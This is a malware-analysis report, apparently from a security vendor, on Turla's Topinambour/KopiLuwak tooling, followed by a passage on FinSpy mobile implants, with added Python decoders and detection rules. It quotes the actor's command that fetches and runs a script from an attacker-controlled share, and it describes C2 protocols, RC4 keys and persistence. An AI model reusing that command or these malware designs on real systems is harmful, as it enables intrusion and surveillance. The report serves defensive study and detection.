15 July 2019

Turla renews its arsenal with Topinambour

Turla, also known as Venomous Bear, Waterbug, and Uroboros, is a Russian-speaking threat actor known since 2014, but with roots that go back to 2004 and earlier. It is a complex cyberattack platform focused predominantly on diplomatic and government-related targets, particularly in the Middle East, Central and Far East Asia, Europe, North and South America and former Soviet bloc nations.

2019 has seen the Turla actor actively renew its arsenal. Its developers are still using a familiar coding style, but they’re creating new tools. Here we’ll tell you about several of them, namely “Topinambour” (aka Sunchoke – the Jerusalem artichoke) and its related modules. We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves.

The new modules were used in an active campaign that started at the beginning of 2019. As usual, the actor targeted governmental entities. The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan. Moreover, this actor now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak. Among the control servers there are several legitimate but compromised WordPress websites with the actor’s .php scripts on them.

This time, the developers left some Easter eggs for the targets and researchers. The .NET modules include amusing strings such as “TrumpTower” as an initial vector for RC4 encryption. “RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and “MiamiBeach” serve as the first beacon messages from the victim to the control server.

How Topinambour spreads

To deliver all this to targets, the operators use legitimate software installers infected with the Topinambour dropper. These could be tools to circumvent internet censorship, such as “Softether VPN 4.12” and “psiphon3”, or Microsoft Office “activators”.

The dropper contains a tiny .NET shell that will wait for Windows shell commands from the operators. Using this and SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules using just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through public networks.

These campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with “197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”. Lateral movements in the target’s infrastructure show how familiar the campaign operators are with the IPv6 protocol. Along with IPv4 they use the newer version for shell commands and LAN addresses.

What Topinambour wants from the targets

The purpose of all this infrastructure and modules in JavaScript, .NET and PowerShell is to build a “fileless” module chain on the victim’s computer consisting of an initial small runner and several Windows system registry values containing the encrypted remote administration tool. The tool does all that a typical Trojan needs to accomplish: upload, download and execute files, fingerprint target systems. The PowerShell version of the Trojan also has the ability to get screenshots.

Trojan: command set
JavaScript: exit, upld, inst, wait, dwld
.NET: #down, #upload, #timeout, #stop, #sync
PowerShell: #upload, #down, #screen, #timeout, #stop, #sync

Even the command system in the different Trojans is quite similar

Interesting technical features

A plausible hypothesis for developing similar malware in different languages could be to avoid detection: if one version is detected on the victim’s computer, the operators can try an analogue in a different language. In the table below, we compare Trojans in terms of encryption keys in use and initial messages to control servers.

JavaScript KopiLuwak
  RC4 encryption key: 01a8cbd328df18fd49965d68e2879433
  Initial beacon to C2: “bYVAoFGJKj7rfs1M” plus a hash based upon the Windows installation date
.NET
  RC4 encryption key: TrumpTower
  Initial beacon to C2: RocketMan!
PowerShell
  RC4 encryption key: TimesNewRoman
  Initial beacon to C2: MiamiBeach

For some reason, the developers prefer to entertain targets and researchers instead of randomizing strings

Our analysis of the dropper is based on the sample below:

SHA256 8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284
MD5 110195ff4d7298ba9a186335c55b2d1f
Compiled 2018.09.10 12:08:14 (GMT)
Size 1 159 680
Original name topinambour.exe

The dropper sample on which our analysis is based implements the following features:

Dropper function: features
unpack_p: drops the payload to %LOCALAPPDATA%/VirtualStore/certcheck.exe. The “p” in the function name and in the corresponding dropper resource stands for “payload”.
make_some_noise: gains persistence for the payload with a scheduled task that starts every 30 minutes.
unpack_o: drops the original application that the dropper tries to mimic (such as psiphon3) to %TEMP%/activator.exe and runs it. Here “o” in the function name and in the corresponding dropper resource stands for “original”.

The Topinambour authors decided to name the remote shell persistence function “make_some_noise()”

Dropped tiny .NET remote shell

The tiny dropped application gets Windows shell commands from the C2 and silently executes them.

The Topinambour tiny .NET shell first tries to get commands from an external IP, which looks like a LAN, and then continues with possibly infected LAN IPs

The first DWORD (four bytes) received after a TCP request to the C2 is the data size for the following communication. Then the data contained in the next packets will be the Windows shell command to silently execute the application using “cmd.exe /c”. And that’s it – straightforward, simple and useful.
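A decoder for that framing, added here as an example and not code from the Kaspersky write-up: it splits a reassembled operator-to-shell TCP stream into commands and flags the “cmd.exe /c” pattern, which is what an analyst would run over bytes carved from a capture during incident response. Little-endian byte order for the DWORD, the 64 KB sanity limit and the sample commands are assumptions or constructions; the placeholder `<vps_ip>` stands in for the operator address, which the write-up does not give.

```python
import struct

# Constructed sanity limit: a "command" larger than this is treated as a parse error
# (or a non-protocol stream) rather than as a real shell command.
MAX_FRAME = 64 * 1024

# Constructed sample commands (not captured traffic). The second mirrors the staging
# chain in the write-up with the VPS address and password replaced by placeholders.
SAMPLE_COMMANDS = [
    b"cmd.exe /c whoami",
    b"cmd.exe /c net use \\\\<vps_ip>\\c$ <user_pass_here> /user:administrator",
]


def frame(command: bytes) -> bytes:
    """Wrap one command the way the write-up describes: a DWORD size, then the data.

    Little-endian byte order is an assumption; the write-up only says 'DWORD'.
    """
    return struct.pack("<I", len(command)) + command


def parse_frames(stream: bytes):
    """Split a reassembled operator->shell TCP stream into command payloads.

    Returns (commands, consumed). Parsing stops at the first frame that is
    implausibly large or runs past the end of the capture, so a truncated pcap
    yields the complete frames plus the offset where the unparsed remainder begins.
    """
    commands = []
    offset = 0
    while offset + 4 <= len(stream):
        (size,) = struct.unpack_from("<I", stream, offset)
        if size > MAX_FRAME or offset + 4 + size > len(stream):
            break
        commands.append(stream[offset + 4 : offset + 4 + size])
        offset += 4 + size
    return commands, offset


def silent_exec_commands(commands):
    """Return the commands that use the shell's 'cmd.exe /c' silent-execution pattern."""
    return [c.decode("latin-1") for c in commands if c.lower().startswith(b"cmd.exe /c")]


if __name__ == "__main__":
    stream = b"".join(frame(c) for c in SAMPLE_COMMANDS)
    cmds, used = parse_frames(stream)
    print(f"{len(cmds)} frame(s), {used} of {len(stream)} bytes consumed")
    for c in silent_exec_commands(cmds):
        print("  ", c)
```

Because the loop advances by at least four bytes per iteration and refuses oversized lengths, feeding it an arbitrary non-protocol stream terminates quickly with zero frames instead of allocating on a bogus size.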

KopiLuwak dropper

This is where the notorious KopiLuwak comes into play. The .NET remote shell silently downloads scripts from the C2 – from the opened SMB share on a remote CELL-C VPS in South Africa to be precise. “Net use” and “copy” Windows shell commands are enough to fulfil the task.

cmd.exe /c net use \\\c$ <user_pass_here> /user:administrator & copy /y \\\c$\users\public\documents\i.js $documents\j.js & $documents\j.js

As a result, the victim is infected with a KopiLuwak obfuscated JavaScript.
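A detection over process-creation command lines for the staging chain quoted above, added here as an example and not code from the Kaspersky report or the actor. The sample records are constructed in the shape of Sysmon Event ID 1 or Security 4688 CommandLine fields, with the VPS address and password replaced by placeholders; the indicator names and the rule that combines an administrative-share mount with a script copy or execution are this example's own design, chosen because a lone “net use” to an admin share is routine administrator activity.

```python
import re

# Constructed process-creation records (not real telemetry). The first mirrors the
# chain from the write-up with placeholders for the VPS address and password; the
# other two are ordinary administrative file-share use.
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmdline": r"cmd.exe /c net use \\<vps_ip>\c$ <user_pass_here> /user:administrator & copy /y \\<vps_ip>\c$\users\public\documents\i.js C:\Users\alice\Documents\j.js & C:\Users\alice\Documents\j.js"},
    {"host": "WS-02", "cmdline": r"cmd.exe /c net use Z: \\fileserver\share /persistent:yes"},
    {"host": "WS-03", "cmdline": r"cmd.exe /c copy /y \\fileserver\share\report.docx C:\Users\alice\Documents\report.docx"},
]

# One regex per indicator so an alert explains itself.
INDICATORS = {
    # 'net use' against an administrative share (c$, d$, admin$) on a UNC host
    "admin_share_mount": re.compile(r"\bnet\s+use\s+\\\\\S+?\\(?:[a-z]\$|admin\$)", re.I),
    # explicit credentials passed on the command line
    "inline_credentials": re.compile(r"/user:\S+", re.I),
    # copy of a script file from a UNC path
    "script_copy_from_share": re.compile(r"\bcopy\s+(?:/y\s+)?\\\\\S+\.(?:js|jse|vbs|wsf)\b", re.I),
    # the chained command ends by launching a script
    "script_executed": re.compile(r"&\s*(?:wscript(?:\.exe)?\s+|cscript(?:\.exe)?\s+)?\S+\.(?:js|jse|vbs|wsf)\s*$", re.I),
}


def match_indicators(cmdline: str) -> list:
    """Return the names of all indicators that fire on one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_staging_chain(hits: list) -> bool:
    """Alert only when an admin-share mount is combined with a script copy or execution."""
    return "admin_share_mount" in hits and (
        "script_copy_from_share" in hits or "script_executed" in hits
    )


def triage(events):
    """Run the indicators over events and return (host, hits) for each alert."""
    alerts = []
    for ev in events:
        hits = match_indicators(ev["cmdline"])
        if is_staging_chain(hits):
            alerts.append((ev["host"], hits))
    return alerts


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, "->", ", ".join(hits))
```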

Deobfuscated KopiLuwak dropper that puts the RC4 decryption key into the scheduler task for next-stager persistence

Its functions are described in the table below:

Script function: features
Create scheduler task: creates a task named ProactiveScan with the description “NTFS Volume Health Scan”, which runs C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js with the parameters “-scan Kdw6gG7cpOSZsBeH”, where the parameter is the RC4 decryption key.
Fingerprint host: saves the output of a set of commands such as systeminfo, net view, tasklist /v, gpresult /z, dir "%programfiles%\Kaspersky Lab", tracert www.google.com to %appdata%\Microsoft\t235.dat.
Drop next JavaScript: drops C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js.
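A hunt for the persistence described in this table, added here as an example rather than code from the original analysis: it parses Task Scheduler XML, flags actions that run a script from a user-writable path and extracts the -scan argument as a candidate RC4 key for the next stage. The two task definitions are constructed (user name alice, a benign defrag-style task); that the task's Command is the .js path itself is an assumption about how the task was registered.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed task definitions in the Task Scheduler XML schema (what `schtasks /query
# /xml` exports). Real exports are UTF-16; decode them to str before parsing.
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\ProactiveScan</URI>
    <Description>NTFS Volume Health Scan</Description>
  </RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\alice\AppData\Roaming\Microsoft\Chkdsk.js</Command>
      <Arguments>-scan Kdw6gG7cpOSZsBeH</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\Maintenance\WeeklyDefrag</URI>
    <Description>Disk maintenance (constructed benign task)</Description>
  </RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>C: /O</Arguments>
    </Exec>
  </Actions>
</Task>"""

SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # script path is their first argument
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "%appdata%", "%localappdata%", "%temp%")


def _local(tag: str) -> str:
    """Strip the schema namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name: str) -> str:
    """Text of the first descendant with the given local name, or ''."""
    for e in elem.iter():
        if _local(e.tag) == name:
            return (e.text or "").strip()
    return ""


def triage_task(task_xml: str) -> dict:
    """Flag a task whose action runs a script from a user-writable path and pull out
    any '-scan <key>' argument as a candidate RC4 key for the next stage."""
    root = ET.fromstring(task_xml)
    result = {"name": _child_text(root, "URI"),
              "description": _child_text(root, "Description"),
              "findings": [], "rc4_key_candidate": None}
    for exec_ in (e for e in root.iter() if _local(e.tag) == "Exec"):
        command = _child_text(exec_, "Command")
        arguments = _child_text(exec_, "Arguments")
        target = command
        if PureWindowsPath(command).name.lower() in SCRIPT_HOSTS:
            m = re.match(r'\s*"?([^"\s]+)', arguments)
            target = m.group(1) if m else ""
        if PureWindowsPath(target).suffix.lower() in SCRIPT_EXTENSIONS:
            result["findings"].append("script_action")
        if any(p in target.lower() for p in USER_WRITABLE):
            result["findings"].append("user_writable_path")
        m = re.search(r"-scan\s+(\S+)", arguments, re.I)
        if m:
            result["findings"].append("scan_key_argument")
            result["rc4_key_candidate"] = m.group(1)
    return result


if __name__ == "__main__":
    for xml_text in (SUSPECT_TASK, BENIGN_TASK):
        print(triage_task(xml_text))
```

Running this over every task on a host surfaces the “Chkdsk.js” task even when the name and description are chosen to look like built-in maintenance, because the rule keys on where the action lives and what it runs, not on the task's self-description.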

The dropped “Chkdsk.js” decrypts one more script using the RC4 key provided in the dropper’s scheduled task and runs the decrypted code. This final stager is a more complex Trojan, able to parse and execute custom commands from the C2.

The operators get the victim’s data in XML format: every message has a 16-byte signature at the beginning and a victim-specific fingerprint that the developer calls “ridid”.

Constant (bytes): value and features
magic (16): every encrypted message from the infected host starts with this. In the samples described, the magic bytes are ‘bYVAoFGJKj7rfs1M’.
ridid (32): hash value, based on the Windows installation date and the aforementioned 16-byte magic value.
RC4 iv (32): RC4 initial vector used to encrypt communication between the target and the C2. In the samples described, the IV value is “01a8cbd328df18fd49965d68e2879433”.

Decrypted and deobfuscated target hashing algorithm, based on Windows installation date and 16-byte hardcoded string

The malware communicates with a legitimate, compromised WordPress-based website and gets four-byte commands from a URL like “http://<legitimate domain>/wp-includes/Requests/Socks.php”. First, the malware beacons to its C2 and receives the command to execute as the answer.

Command: features
exit: sends the “t235.dat” fingerprinting file content with “upl” text in the XML message, deletes the file and stops script execution
upld: sends the “t235.dat” content with “upl” text in the XML message. If no such file exists, or it is empty, it sends the text “opt file no exists or size limit” in the XML message
inst: command format is:
  • three bytes after the command – overall server response length
  • three following bytes – the marker “jss”
  • tail – JavaScript to execute
  Sends ‘good install’ and the “t235.dat” content in the XML messages. Saves the executed JavaScript file as %APPDATA%\Microsoft\ghke94d.jss
wait: does nothing
dwld: command format is the same as for the “inst” command, but the script from the server is not executed at once. It saves the decrypted JavaScript as %APPDATA%\Microsoft\awgh43.js and sends ‘success get_parse_command’ in the XML message

KopiLuwak JavaScript
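A decoder for the victim-to-C2 message layout described above (16-byte magic, 32-byte ridid, RC4-encrypted XML) and for the inst/dwld response framing in the command table, added here as an example and not tooling from the original analysis. Assumptions, marked in the code: the ASCII bytes of the 32-character value the write-up calls the RC4 “IV” serve as the RC4 key, the XML body follows the ridid directly, server responses are RC4-encrypted as a whole, and the three-byte length is ASCII decimal. The sample ridid, XML and script are constructed.

```python
MAGIC = b"bYVAoFGJKj7rfs1M"  # 16-byte magic from the write-up
# The 32-character value the write-up calls the RC4 "IV"; using its ASCII bytes as
# the RC4 key is an assumption.
RC4_KEY = b"01a8cbd328df18fd49965d68e2879433"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def parse_beacon(message: bytes) -> dict:
    """Victim -> C2 message: 16-byte magic, 32-byte ridid, then RC4-encrypted XML.

    That the XML body directly follows the ridid is an assumption about the layout.
    """
    if message[:16] != MAGIC:
        raise ValueError("magic mismatch: not a KopiLuwak beacon")
    ridid = message[16:48].decode("ascii")
    xml = rc4(RC4_KEY, message[48:]).decode("utf-8")
    return {"ridid": ridid, "xml": xml}


def parse_server_command(response: bytes) -> dict:
    """C2 -> victim response: four-byte command; for inst/dwld, a three-byte overall
    length, the marker 'jss', and the script as the tail.

    Assumed: the response is RC4-encrypted as a whole and the length field is
    three ASCII decimal digits.
    """
    plain = rc4(RC4_KEY, response)
    command = plain[:4].decode("ascii")
    result = {"command": command}
    if command in ("inst", "dwld"):
        declared = int(plain[4:7])
        if declared != len(plain):
            raise ValueError(f"length field {declared} != response size {len(plain)}")
        if plain[7:10] != b"jss":
            raise ValueError("missing 'jss' marker")
        result["script"] = plain[10:].decode("utf-8")
        result["execute_now"] = command == "inst"  # dwld only stores the script
    return result


# Constructed samples so the decoder can be exercised offline.
def build_sample_beacon(ridid: str, xml: str) -> bytes:
    assert len(ridid) == 32, "ridid is a 32-byte hash value"
    return MAGIC + ridid.encode("ascii") + rc4(RC4_KEY, xml.encode("utf-8"))


def build_sample_response(command: str, script: str = "") -> bytes:
    body = command.encode("ascii")
    if command in ("inst", "dwld"):
        tail = b"jss" + script.encode("utf-8")
        body += f"{len(body) + 3 + len(tail):03d}".encode("ascii") + tail
    return rc4(RC4_KEY, body)


if __name__ == "__main__":
    beacon = build_sample_beacon("0123456789abcdef0123456789abcdef", "<msg><fp>constructed</fp></msg>")
    print(parse_beacon(beacon))
    print(parse_server_command(build_sample_response("inst", "WScript.Echo(1);")))
```

The two error paths matter in practice: a magic mismatch separates this traffic from other data on the same compromised WordPress host, and a length or marker mismatch tells the analyst the key assumption is wrong before any script tail is written to disk.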

The downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary from target to target.

The slightly obfuscated script used to run the payload from registry

It is not completely clear how the registry keys were created; however, the attackers usually use the .NET initial infector for that. In some samples, there is an additional function to get the victim’s MAC address.

This is the end of the first, “JavaScript” infection chain. Now, let’s also briefly describe the second, .NET-based chain.

.NET RocketMan Trojan

We call this Trojan RocketMan after the string the developer uses for beaconing. Another string inside this malware is “TrumpTower”, used as an RC4 encryption initial vector.

This malware reads the C2 IP and port from the registry where it was saved by the previous stager. It processes the following commands from its C2 that are received encrypted over HTTP:

Command: features
#down: makes an HTTP POST request to http://<config_ip>:<config_port>/file to download the file with the provided name to the victim’s computer
#upload: makes an HTTP GET request to http://<config_ip>:<config_port>/update, decrypts the server response and uploads the file with the provided path and name to the server
#timeout: gets the pause length from the server command argument and waits
#stop: makes an HTTP GET request to http://<config_ip>:<config_port>/exit and stops the Trojan operation
#sync: sends the encrypted “RocketMan!” string to the server

PowerShell MiamiBeach Trojan

Last but not least, the developers behind the Topinambour campaign also used a PowerShell Trojan. This Trojan contains around 450 strings and uses “TimesNewRoman” as the RC4 initial vector to encrypt C2 communications.

This module beacons to its hardcoded C2 with the string “MiamiBeach” using an HTTP POST. The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally, it includes the “#screen” command to take a screenshot.
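A proxy-log hunt for the endpoint pattern shared by the RocketMan command table and the PowerShell Trojan that handles the same commands, added here as an example and not from the original report. The log lines and the 203.0.113.0/24 server addresses are constructed; the five-field log layout is assumed for the example, and the rule requiring a bare IP:port host plus at least two of the three endpoints is a design choice to keep false positives down, since paths such as /update are common on legitimate named hosts.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy access-log lines (epoch, client, method, URL, status); not real
# telemetry. 203.0.113.0/24 is the documentation range, used here for the fake C2.
SAMPLE_LOG = """\
1562700000.101 10.0.0.5 POST http://203.0.113.10:8080/file 200
1562700031.420 10.0.0.5 GET http://203.0.113.10:8080/update 200
1562700100.007 10.0.0.7 GET http://updates.example.com/update 200
1562700142.318 10.0.0.9 POST http://203.0.113.20:9000/file 200
1562700180.556 10.0.0.5 GET http://203.0.113.10:8080/exit 200
"""

# Method/path pairs taken from the write-up's command table.
C2_ENDPOINTS = {("POST", "/file"), ("GET", "/update"), ("GET", "/exit")}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def parse_line(line: str):
    """Parse one log line into a dict, or None for lines that do not fit the layout."""
    m = LINE.match(line.strip())
    return m.groupdict() if m else None


def is_c2_style(method: str, url: str) -> bool:
    """True when the request hits one of the three endpoints on a bare IP:port host.

    Requiring a literal IP with an explicit port mirrors the write-up's
    http://<config_ip>:<config_port>/... templates and drops ordinary update traffic
    to named hosts.
    """
    parts = urlsplit(url)
    host = parts.hostname or ""
    return (method, parts.path) in C2_ENDPOINTS and bool(IPV4.match(host)) and parts.port is not None


def hunt(log_text: str, min_endpoints: int = 2) -> dict:
    """Group matching requests per (client, server) and report pairs where the client
    has touched at least `min_endpoints` distinct endpoints."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not is_c2_style(rec["method"], rec["url"]):
            continue
        parts = urlsplit(rec["url"])
        seen[(rec["client"], f"{parts.hostname}:{parts.port}")].add(parts.path)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_endpoints}


if __name__ == "__main__":
    for (client, server), paths in hunt(SAMPLE_LOG).items():
        print(f"{client} -> {server}: {', '.join(paths)}")
```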


The reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize detection of the well-known, publicly discussed JavaScript versions. Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer, where only a tiny starter would be left.

It’s a bit surprising, amusing and not entirely clear why the developers have used some seemingly US-related strings such as “RocketMan!”, “TrumpTower” or “make_some_noise”. They are hardly likely to serve as false flags. The usage of KopiLuwak, a well-known and exclusive artefact previously used by the Turla group, makes us attribute this campaign to this actor with high confidence.

Indicators of compromise

C2 HTTP GET templates
  • http://<config_ip>:<config_port>/file
  • http://<config_ip>:<config_port>/update
  • http://<config_ip>:<config_port>/exit
Some campaign-related MD5 hashes
  • 47870ff98164155f088062c95c448783
  • 2c1e73da56f4da619c4c53b521404874
  • 6acf316fed472300fa50db54fa6f3cbc
  • 9573f452004b16eabd20fa65a6c2c1c4
  • 3772a34d1b731697e2879bef54967332
  • d967d96ea5d0962e08844d140c2874e0
  • a80bbd753c07512b31ab04bd5e3324c2
  • 37dc2eb8ee56aeba4dbd4cf46f87ae9a
  • 710f729ab26f058f2dbf08664edb3986
Domains and IPs

VPSs used as control servers

10 July 2019

New FinSpy iOS and Android implants revealed ITW

FinSpy is spyware made by the German company Gamma Group. Through its UK-based subsidiary Gamma International, Gamma Group sells FinSpy to government and law enforcement organizations all over the world. FinSpy is used to collect a variety of private user information on various platforms. Its implants for desktop devices were first described in 2011 by Wikileaks, and mobile implants were discovered in 2012. Since then, Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. According to our telemetry, several dozen unique mobile devices have been infected over the past year, with recent activity recorded in Myanmar in June 2019.

Late in 2018, experts at Kaspersky looked at the functionally latest versions of FinSpy implants for iOS and Android, built in mid-2018. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, SMS/MMS messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers.

Malware features

iOS

FinSpy for iOS is able to monitor almost all device activities, including recording VoIP calls made via external apps such as Skype or WhatsApp. The targeted applications include secure messengers such as Threema, Signal and Telegram. However, this functionality is achieved by leveraging Cydia Substrate’s hooking functionality, so the implant can only be installed on jailbroken devices (iPhone or iPad; iPod has not been confirmed) running iOS 11 and below (newer versions were not confirmed at the time of the research, and implants for iOS 12 have not been observed yet). After the deployment process, the implant provides the attacker with almost unlimited monitoring of the device’s activities.

The analyzed implant contained binary files for two different CPU architectures: ARMv7 and ARM64. Taking into account that iOS 11 is the first iOS version that does not support ARMv7 any more, we presumed that the 64-bit version was made to support iOS 11+ targets.

It looks like FinSpy for iOS does not provide infection exploits for its customers, because it seems to be fine-tuned to clean traces of publicly available jailbreaking tools. Therefore, an attacker using the main infection vector will need physical access in order to jailbreak it. For jailbroken devices, there are at least three possible infection vectors:

  • SMS message
  • Email
  • WAP Push

Any of those can be sent from the FinSpy Agent operator’s terminal.

The installation process involves several steps. First, a shell script checks the OS version and executes the corresponding Mach-O binary: “install64” (64-bit version) is used for iOS 11+, otherwise “install7” (32-bit version) is used. When started, the installer binary performs environmental checks, including a Cydia Substrate availability check; if it isn’t available, the installer downloads the required packages from the Cydia repository and installs them using the “dpkg” tool. After that the installer does some path preparations and package unpacking, randomly selects names for the framework and the app from a hardcoded list, deploys components on the target system and sets the necessary permissions. After the deployment process is done, the daemon is started and all temporary installation files are deleted.

The persistence of the implant is achieved by adding “plist” with starting instructions to the /Library/LaunchDaemons path.

All sensitive parameters of the configuration (such as C2 server address, C2 telephone numbers and so on) are stored in the file “84C.dat” or in “PkgConf”, located in a bundle path of the main module. They can be rewritten using operator commands. This filename was used in previous FinSpy versions for different platforms, including Android.

The following list describes all the modules of the analyzed FinSpy version:

Name (format): functionality
netwd (app): framework, launcher of the core module – FilePrep
FilePrep (app): core module
MediaEnhancer (dylib): audio recordings
.vpext (dylib): VoIP calls hooking
.hdutils (dylib): hiding utilities
keys (dylib): keylogger
SBUtils (dylib): SpringBoardHooker utilities
.chext (dylib): messenger tracking
hdjm (unknown): not observed in detected versions, possibly some type of module for hiding traces of a jailbreak

All the internal strings in the modules, including the installer, are encrypted with a simple xor-based algorithm using the following strings as keys: “NSString”, “NSArray”, “NSDictionary”, “ExtAudioFileRef”.
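The string-decryption scheme as a repeating-key XOR, added here as an example and not FinSpy code or Kaspersky’s decryptor: the helper tries each of the four listed keys on an encrypted blob. Repeating-key XOR is an assumption about what “simple xor-based” means, and the sample plaintext is constructed. Since all four keys are alphabetic, XOR with a wrong key onto text encrypted with another key often still yields printable bytes, so the helper reports printability as a hint for the analyst rather than selecting a single answer.

```python
import string

# The four key strings listed in the write-up.
CANDIDATE_KEYS = [b"NSString", b"NSArray", b"NSDictionary", b"ExtAudioFileRef"]
PRINTABLE = set(string.printable.encode("ascii"))


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: byte i of the data is XORed with key[i mod len(key)].

    This is the simplest reading of "simple xor-based algorithm"; the real FinSpy
    routine may add a per-string offset or length prefix, so treat it as an assumption.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_candidates(blob: bytes) -> list:
    """Try every candidate key; return (key, plaintext, looks_printable) triples.

    Printability is only a hint: two alphabetic keys XOR to small byte values, so a
    wrong key frequently maps letters to other letters and still "looks" printable.
    """
    results = []
    for key in CANDIDATE_KEYS:
        plain = xor_with_key(blob, key)
        results.append((key.decode("ascii"), plain.decode("latin-1"),
                        all(b in PRINTABLE for b in plain)))
    return results


def build_sample_blob(plaintext: str, key: bytes) -> bytes:
    """Constructed ciphertext for testing; XOR is symmetric so the same routine encrypts."""
    return xor_with_key(plaintext.encode("utf-8"), key)


if __name__ == "__main__":
    # Constructed sample: a path of the kind an installer would carry, encrypted with NSString.
    blob = build_sample_blob("/Library/LaunchDaemons", b"NSString")
    for key, plain, ok in decode_candidates(blob):
        print(f"{key:16} printable={ok!s:5} {plain!r}")
```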

The core implant module (“FilePrep”) contains 7,828 functions. It controls all the other modules, takes care of HTTP and SMS heartbeats and other service functions. Communication between components is implemented in two ways. The first uses the system’s CPDistributedMessagingCenter, the second is a local HTTP server that receives data requests.

The module “.hdutils” is designed to cover up the tracks of the implant activities on the device. First of all, it configures the processing of all incoming SMS messages. It parses the text looking for specific content and will hide notifications for such messages. Then it sends them to the core module via CPDistributedMessagingCenter (a wrapper over the existing messaging facilities in the operating system, which provides server-client communication between different processes using simple messages and dictionaries). Another hiding feature is to hook the “CLCopyAppsUsingLocation” function in order to remove the core implant module from the displayed list of applications used in Settings geolocation services.

The module “.chext” targets messenger applications and hooks their functions to exfiltrate almost all accessible data: message content, photos, geolocation, contacts, group names and so on. The following messenger applications are targeted:

  • Facebook Messenger (com.facebook.Messenger);
  • Wechat (com.tencent.xin);
  • Skype (com.skype.skype/com.skype.SkypeForiPad);
  • Threema (ch.threema.iapp / ch.threema.iapp.ThreemaShareExtension);
  • InMessage (com.futurebits.instamessage.free);
  • BlackBerry Messenger (com.blackberry.bbm1);
  • Signal (org.whispersystems.signal).

The collected data is submitted to the local server deployed by the main module.

The “keys” module focuses on a different kind of keylogging activity, with multiple hooks that intercept every typed symbol. There are several hooks to intercept the typed unlock password as well as during the change password process. The intercepted password is submitted to the “keys.html” page on the local server, similar to the “.chext” module.

The module “MediaEnhancer” is designed to hook system functions in the “mediaserverd” daemon related to call processing, in order to record calls. The module starts a local HTTP server instance on port 8889 upon initialization, implementing VoIPHTTPConnection as a custom connection class. This class contains a handler for requests to localhost/voip.html that could be made by other components.

The module “.vpext” implements more than 50 hooks used for VoIP calls processed by external messaging apps including:

  • WhatsApp;
  • LINE;
  • Skype (including the independent Skype for iPad version);
  • Viber;
  • WeChat;
  • KakaoTalk;
  • BlackBerry Messenger;
  • Signal.

These hooks modify functions that process VoIP calls in order to record them. To achieve this, they send a POST request with the call’s meta information to the HTTP server previously deployed by the MediaEnhancer component, which starts recording.


The Android implant has similar functionality to the iOS version, but it is also capable of gaining root privileges on an unrooted device by abusing the DirtyCow exploit, which is contained in the malware. FinSpy Android samples have been known for a few years now. Based on the certificate data of the last version found, the sample was deployed in June 2018.

The Android implant’s functionality is unlikely to change much, based on the fact that most of the configuration parameters are the same in the old and new versions. The variety of available settings makes it possible to tailor the behavior of the implant for every victim. For example, operators can choose the preferred communication channels or automatically disable data transfers while the victim is in roaming mode. All the configuration data for an infected Android device (including the location of the control server) is embedded in the implant and used afterwards, but some of the parameters can be changed remotely by the operator. The configuration data is stored in compressed format, split into a set of files in the assets directory of the implant apk. After extracting all pieces of data and building the configuration file, it’s possible to get all the configuration values. Each value in the configuration file is stored after the little-endian value of its size, and the setting type is stored as a hash.

For example, the following interesting settings found in the configuration file of the developer build of the implant can be marked: mobile target ID, proxy ip-address, proxy port, phone number for remote SMS control, unique identifier of the installed implant.
